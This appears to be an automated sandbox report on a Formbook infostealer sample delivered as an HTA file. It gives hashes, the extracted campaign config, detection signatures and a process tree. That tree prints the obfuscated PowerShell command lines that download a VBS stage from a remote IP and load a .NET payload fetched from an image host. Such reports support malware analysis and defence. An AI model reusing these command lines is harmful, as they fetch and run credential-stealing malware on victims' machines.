formbook | f42f2afb4ad2de01d20f30facd401761b6182a6a74997108e6ba827069e9a666

Analysis

max time kernel
147s
max time network
114s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
04-02-2025 19:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sheisverynicegirllokyetaroudntheglobalgoodnice.hta
Size

14KB
MD5

f5ec2118957b7a9908d1c588c50f4df9
SHA1

ee81165c895755372747a345116470489e3a902b
SHA256

f42f2afb4ad2de01d20f30facd401761b6182a6a74997108e6ba827069e9a666
SHA512

3f85fd0471313c2de3eb2c4b5fe672bb9f95b9bace50d428ac87722f3cb7e3a57177fae177d008632aa70ad7b018d67d15aaafbe229ebb3219073c3905c28775
SSDEEP

48:3NaPwm0vV7iaB9wm0vV7HYzBPTHtFVJt+AWnwJx81LKChaoWaAddIWwm0vV7I1ac:dmg7isg74zBPT3VJt+VnHYGG3g7ql

Score

10^/10

formbook b101 defense_evasion discovery execution rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

b101

Decoy

ent-apartments-2801.click

lsyw.top

eccurastock.online

j958.net

eepelement.tech

rueblueimpact.shop

etechhome.net

ianchui.cfd

mall-business-22321.bond

tatewidefinancialservices.net

orbitmac.info

ovehkjepe88.club

zzhmamn.xyz

uslimbooking.net

uto253.pro

ortalexpresscliepr.lat

tikk.shop

iaoniang.cfd

sdg-6603.cyou

myd.net

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Formbook family
formbook

Formbook payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/2296-89-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral2/memory/2976-93-0x0000000000D80000-0x0000000000DAF000-memory.dmp	formbook

Blocklisted process makes network request 3 IoCs

flow	pid	Process
19	3348	powershell.exe
23	5112	powershell.exe
24	5112	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
4400	cmd.exe
3348	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5112	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 5112 set thread context of 2296	5112	powershell.exe	97
PID 2296 set thread context of 3464	2296	aspnet_compiler.exe	56
PID 2976 set thread context of 3464	2976	colorcpl.exe	56

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	colorcpl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 62 IoCs

pid	Process
3348	powershell.exe
3348	powershell.exe
5112	powershell.exe
5112	powershell.exe
2296	aspnet_compiler.exe
2296	aspnet_compiler.exe
2296	aspnet_compiler.exe
2296	aspnet_compiler.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe
2976	colorcpl.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
2296	aspnet_compiler.exe
2296	aspnet_compiler.exe
2296	aspnet_compiler.exe
2976	colorcpl.exe
2976	colorcpl.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3348	powershell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	2296	aspnet_compiler.exe
Token: SeShutdownPrivilege	3464	Explorer.EXE
Token: SeCreatePagefilePrivilege	3464	Explorer.EXE
Token: SeDebugPrivilege	2976	colorcpl.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3464	Explorer.EXE

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 4400	2364	mshta.exe	85
PID 2364 wrote to memory of 4400	2364	mshta.exe	85
PID 2364 wrote to memory of 4400	2364	mshta.exe	85
PID 4400 wrote to memory of 3348	4400	cmd.exe	88
PID 4400 wrote to memory of 3348	4400	cmd.exe	88
PID 4400 wrote to memory of 3348	4400	cmd.exe	88
PID 3348 wrote to memory of 4364	3348	powershell.exe	91
PID 3348 wrote to memory of 4364	3348	powershell.exe	91
PID 3348 wrote to memory of 4364	3348	powershell.exe	91
PID 4364 wrote to memory of 3984	4364	csc.exe	92
PID 4364 wrote to memory of 3984	4364	csc.exe	92
PID 4364 wrote to memory of 3984	4364	csc.exe	92
PID 3348 wrote to memory of 4060	3348	powershell.exe	94
PID 3348 wrote to memory of 4060	3348	powershell.exe	94
PID 3348 wrote to memory of 4060	3348	powershell.exe	94
PID 4060 wrote to memory of 5112	4060	WScript.exe	95
PID 4060 wrote to memory of 5112	4060	WScript.exe	95
PID 4060 wrote to memory of 5112	4060	WScript.exe	95
PID 5112 wrote to memory of 2296	5112	powershell.exe	97
PID 5112 wrote to memory of 2296	5112	powershell.exe	97
PID 5112 wrote to memory of 2296	5112	powershell.exe	97
PID 5112 wrote to memory of 2296	5112	powershell.exe	97
PID 5112 wrote to memory of 2296	5112	powershell.exe	97
PID 5112 wrote to memory of 2296	5112	powershell.exe	97
PID 3464 wrote to memory of 2976	3464	Explorer.EXE	98
PID 3464 wrote to memory of 2976	3464	Explorer.EXE	98
PID 3464 wrote to memory of 2976	3464	Explorer.EXE	98
PID 2976 wrote to memory of 4460	2976	colorcpl.exe	99
PID 2976 wrote to memory of 4460	2976	colorcpl.exe	99
PID 2976 wrote to memory of 4460	2976	colorcpl.exe	99

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3464
- C:\Windows\SysWOW64\mshta.exe
  C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sheisverynicegirllokyetaroudntheglobalgoodnice.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" "/C pOwerSHelL.EXE -eX bypass -NOP -W 1 -c devicecREDeNTIALDepLOYMEnT.eXE ; iEX($(IeX('[SYstEm.tEXT.ENCODiNG]'+[chaR]58+[chaR]58+'utF8.GetstRiNg([systEM.cOnvErt]'+[ChAr]0X3a+[CHar]58+'FRoMbASe64strING('+[cHAR]34+'JFZqb2hLVnZHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMbW9OLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdEYnosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOVk8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRllxUk1qYlEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtckoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVTcEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWam9oS1Z2Rzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE4NS4yOS4xMC4zMC94YW1wcC9mYm8vc2hlaXNhZ29vZGdpcmx3aG9sb3Zlc215YmVzdGlyZWdvb2QuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzYWdvb2RnaXJsd2hvbG92ZXNteWJlc3RpcmVnb29kYmVzdGlyZWdvb2QudmJzIiwwLDApO1N0QXJULVNMRWVQKDMpO0lOdk9LZS1JVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzaGVpc2Fnb29kZ2lybHdob2xvdmVzbXliZXN0aXJlZ29vZGJlc3RpcmVnb29kLnZicyI='+[char]0x22+'))')))"
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4400
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      pOwerSHelL.EXE -eX bypass -NOP -W 1 -c devicecREDeNTIALDepLOYMEnT.eXE ; iEX($(IeX('[SYstEm.tEXT.ENCODiNG]'+[chaR]58+[chaR]58+'utF8.GetstRiNg([systEM.cOnvErt]'+[ChAr]0X3a+[CHar]58+'FRoMbASe64strING('+[cHAR]34+'JFZqb2hLVnZHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMbW9OLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdEYnosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOVk8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRllxUk1qYlEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtckoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVTcEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWam9oS1Z2Rzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE4NS4yOS4xMC4zMC94YW1wcC9mYm8vc2hlaXNhZ29vZGdpcmx3aG9sb3Zlc215YmVzdGlyZWdvb2QuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzYWdvb2RnaXJsd2hvbG92ZXNteWJlc3RpcmVnb29kYmVzdGlyZWdvb2QudmJzIiwwLDApO1N0QXJULVNMRWVQKDMpO0lOdk9LZS1JVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzaGVpc2Fnb29kZ2lybHdob2xvdmVzbXliZXN0aXJlZ29vZGJlc3RpcmVnb29kLnZicyI='+[char]0x22+'))')))"
      4⤵
      Blocklisted process makes network request
      Evasion via Device Credential Deployment
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3348
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0g5bezx0\0g5bezx0.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4364
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE687.tmp" "c:\Users\Admin\AppData\Local\Temp\0g5bezx0\CSC85E7D0342E402D8E606282A9D7F2C6.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3984
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sheisagoodgirlwholovesmybestiregoodbestiregood.vbs"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4060
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAG8AZwBlAGMAbgBhAG0AcgBvAGYAcgBlAHAAZQBpAHQAcwBlAGIAeQBtAGUAZQBzAC8AbwBiAGYALwBwAHAAbQBhAHgALwAwADMALgAwADEALgA5ADIALgA1ADgAMQAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAbQB3AG4AbQBlAG0AYwBtAC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgANgA0ADUANgAyADkALwB1AG4AdwB5AGQAcgA0AG4AcgByAGsAYgBzAGYAZABqAHAAdwB6ADIALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAGEAcwBwAG4AZQB0AF8AYwBvAG0AcABpAGwAZQByACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5112
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        7⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
- C:\Windows\SysWOW64\colorcpl.exe
  "C:\Windows\SysWOW64\colorcpl.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2976
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
a8f102fdfc83c09350fa70547538893c

SHA1
b26d6b0c322ee44ef7376e9b72f54ae803b03aac

SHA256
86ddddd68ebe9e20e6975bc0a67c9cd5def6df8117623c24b17f371e32f2ca97

SHA512
0b1574e1a91c88e61219286c62012f47c9493aa0578510b7f0247ca60f34966e1f78577265b370cadf6ed9150b88ad3b09d7a52ca21483b2cc5724dbbadecf66

Download Submit
C:\Users\Admin\AppData\Local\Temp\0g5bezx0\0g5bezx0.dll

Filesize
3KB

MD5
3f82c92cd46f9bf4db450b6493a5607f

SHA1
698460647e286ee8b935c6d28aa5010a4fa6ca68

SHA256
f2a90a9935bbc9a7a120c7edae240cb45821d067df812f5ab3205e09572b39dd

SHA512
f44b53bea6dede5a866463b38a30b58a23819df712cf9ff4dd9e5db99708200e0e3e91b83d395f0718496a031453b18fb8d2aec319af1548e0db1497c6c45cb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE687.tmp

Filesize
1KB

MD5
9b575eba6b9cefc8d5d812215040ba9d

SHA1
47a202fea2a5677748299eed308293eeb5828c0f

SHA256
56ff5213d63a0a89e226b4b3476240602e87f99fd735d38666c8b6d4fa1ff884

SHA512
8a1e2ac6321fe3ae6212bb974979de8510739f6ff842104e49e85760f41e79e113927ea319c224c496d07b7114dbbf5bf95d3a4bd8aaabc0313ed9e0ceb0b1d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2nh1rzi.200.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\sheisagoodgirlwholovesmybestiregoodbestiregood.vbs

Filesize
216KB

MD5
47e3d5a5548cf3a9a292f5b90a3129a1

SHA1
224cf22a37892c36d14910a3bd8b421a787c4f78

SHA256
c6a8405820ea5f76706626a0afaa41b02fa24095748cd32fd391831362857c1d

SHA512
c9d9bdb076df63926a211eadb5aba1ec1599bcc2bf01e7545053f5abdd975056bf2cd1bb643530d9b60e14e60bf826c393980c9b395fc26e3eebca5ca3c0d004

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0g5bezx0\0g5bezx0.0.cs

Filesize
459B

MD5
321557568a71ac2e7582195c0bcf8e5a

SHA1
7dc90f6afdff0242e4a8845a467ba90a4d17a07c

SHA256
90c209f1331fce37679f6e9b72e8896d19215661fda884efd208b4667824cb3a

SHA512
b8f8fe949bd814dfcb2314b2af8e0650c2f18a5f277e0a50cfd32b210fdcef9ab8d201e0b137cd52ab3bd00f8c1d7cbcac20b8c65aefeba55beb14e697b5761d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0g5bezx0\0g5bezx0.cmdline

Filesize
369B

MD5
8e349a44d0ef7127faaab32305221c71

SHA1
86828ae8008b82f40c3956c58fc382859b5f8234

SHA256
b2e40d3eebe4c7618894ed143880ecf6e0038c9ffbb6315f8b9db27fc1d8ee1e

SHA512
3a0bdfc1e197c919b5451169e91d9a963ff4a00cb7e16c679d8f3a70bf29a8b76eb28079d9683efebdb5be1b492c7b44c3bae40eb51bd9cec3a8094b3576bedc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0g5bezx0\CSC85E7D0342E402D8E606282A9D7F2C6.TMP

Filesize
652B

MD5
4e26d1e0d7256022566a88dea1d94347

SHA1
c67e6b79c0daeb4f03918972453425833c98c25a

SHA256
c41960480d31a02f6b389c4a8c2589b669e1c2bf63093528c092ff7bec01359b

SHA512
1f8faee5319df46b6ee23ecb6561e6ac503019643a25a123850e063af4cdba994b7a5ba7849df39d8568cd833b272d0da675ffaf1f88bb8943cd75f21745258f

Download Submit
memory/2296-89-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2976-93-0x0000000000D80000-0x0000000000DAF000-memory.dmp

Filesize
188KB

Download
memory/2976-92-0x0000000000640000-0x0000000000659000-memory.dmp

Filesize
100KB

Download
memory/3348-38-0x0000000006A70000-0x0000000006A8A000-memory.dmp

Filesize
104KB

Download
memory/3348-43-0x0000000006F70000-0x0000000006F84000-memory.dmp

Filesize
80KB

Download
memory/3348-18-0x00000000059F0000-0x0000000005A0E000-memory.dmp

Filesize
120KB

Download
memory/3348-19-0x0000000005A30000-0x0000000005A7C000-memory.dmp

Filesize
304KB

Download
memory/3348-20-0x00000000069B0000-0x00000000069E2000-memory.dmp

Filesize
200KB

Download
memory/3348-21-0x000000006E4F0000-0x000000006E53C000-memory.dmp

Filesize
304KB

Download
memory/3348-22-0x0000000071C30000-0x00000000723E0000-memory.dmp

Filesize
7.7MB

Download
memory/3348-23-0x000000006E660000-0x000000006E9B4000-memory.dmp

Filesize
3.3MB

Download
memory/3348-33-0x0000000005FD0000-0x0000000005FEE000-memory.dmp

Filesize
120KB

Download
memory/3348-34-0x0000000006CB0000-0x0000000006D53000-memory.dmp

Filesize
652KB

Download
memory/3348-35-0x0000000071C30000-0x00000000723E0000-memory.dmp

Filesize
7.7MB

Download
memory/3348-36-0x0000000071C30000-0x00000000723E0000-memory.dmp

Filesize
7.7MB

Download
memory/3348-6-0x0000000005350000-0x00000000053B6000-memory.dmp

Filesize
408KB

Download
memory/3348-37-0x00000000073E0000-0x0000000007A5A000-memory.dmp

Filesize
6.5MB

Download
memory/3348-39-0x0000000006DB0000-0x0000000006DBA000-memory.dmp

Filesize
40KB

Download
memory/3348-40-0x0000000006FD0000-0x0000000007066000-memory.dmp

Filesize
600KB

Download
memory/3348-41-0x0000000006F30000-0x0000000006F41000-memory.dmp

Filesize
68KB

Download
memory/3348-7-0x00000000053C0000-0x0000000005426000-memory.dmp

Filesize
408KB

Download
memory/3348-42-0x0000000006F60000-0x0000000006F6E000-memory.dmp

Filesize
56KB

Download
memory/3348-17-0x0000000005430000-0x0000000005784000-memory.dmp

Filesize
3.3MB

Download
memory/3348-44-0x0000000006FB0000-0x0000000006FCA000-memory.dmp

Filesize
104KB

Download
memory/3348-45-0x0000000006FA0000-0x0000000006FA8000-memory.dmp

Filesize
32KB

Download
memory/3348-58-0x0000000006FA0000-0x0000000006FA8000-memory.dmp

Filesize
32KB
